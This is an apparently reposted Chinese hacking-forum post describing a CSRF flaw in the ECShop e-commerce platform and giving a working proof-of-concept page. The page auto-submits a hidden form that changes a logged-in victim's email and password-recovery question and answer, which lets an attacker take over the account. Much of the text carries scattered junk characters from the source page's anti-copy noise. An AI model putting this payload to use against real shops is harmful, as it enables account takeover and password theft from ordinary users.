中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
6 P8 p  o, @  G1 Fecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
+ N) J( B2 j3 h7 L$ H3 r( I- Z% I
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
2 a7 P& T9 {6 a) b- x& v" p) a' F& ~3 B2 Z- R
详细说明:$ a( V- A  A: y
利用csrf和xss可以突破官方所说的“障碍”
/ L1 ~6 h4 i" L9 N* [2 \xss版本已经有人说明
& R, K! ]' y& _2 r这里给出csrf版本
  e! H# j8 _- O4 z& t
. ]3 V, g0 a  k0 T- K* o漏洞证明:0 s2 a% a' Y+ ]( w' O
<html>
) R/ o0 j$ i1 b. d$ i: s& I<body>
# m8 r8 m3 j" N, H, R1 L( T<form action="http://www.wooyun.org/ecshop/user.php" method="POST">4 f6 c( K4 v3 B: A0 \5 R: ?- E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">+ c# V& O, y5 @5 W* N( F
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
* e' ~! f# p4 w/ ^1 o, B, Z<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 R/ P) e3 k* k: b7 S
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
( R% R# \3 _# S; T  p/ x7 M& _</body>
6 H( C( p5 g* T$ ]<script>! C* s+ C& s9 W  X
document.forms[0].submit();. {, [' @: g" P- K
</script>, u4 _7 v. }, T) |
</html>0 j- L; F0 w. b/ L$ r/ y# \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失) g; |7 c; |' t/ g7 y

& i+ q! e, D% t2 u! I* f: n; v0 [$ R' i




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2